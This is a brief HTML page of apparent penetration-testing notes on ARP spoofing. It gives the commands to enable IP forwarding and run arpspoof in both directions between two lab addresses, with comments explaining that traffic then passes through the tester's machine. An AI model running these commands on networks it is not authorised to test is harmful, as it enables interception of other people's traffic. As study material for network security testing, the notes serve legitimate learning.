<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Arp-Spoof</title>
</head><body>echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br/>
<br/>
arpspoof -i tap0 -t 10.185.11.1 -r 10.185.10.34<br/>
<br/>
arpspoof -i tap0 -t 10.185.10.34 -r 10.185.11.1<br/>
<br/>
=================<br/>
<br/>
<br/>
echo 1 &gt; /proc/sys/net/ipv4/ip_forward &nbsp;&lt;--enable ip forwarding first<br/>
<br/>
arpspoof -i tap0 -t 172.16.5.1 -r 172.16.5.23 &nbsp;&lt;---this will tell 172.16.5.1 that if they need to communicate with 172.16.5.23 they must pass from the pentester system<br/>
<br/>
now, in a separate terminal, <br/>
<br/>
arpspoof -i tap0 -t 172.16.5.23 -r 172.16.5.1 &lt;---this will tell 172.16.5.23 that if the need to communicate with 172.16.5.1 they must pass <br/>
<br/>
from the pentester system</body></html>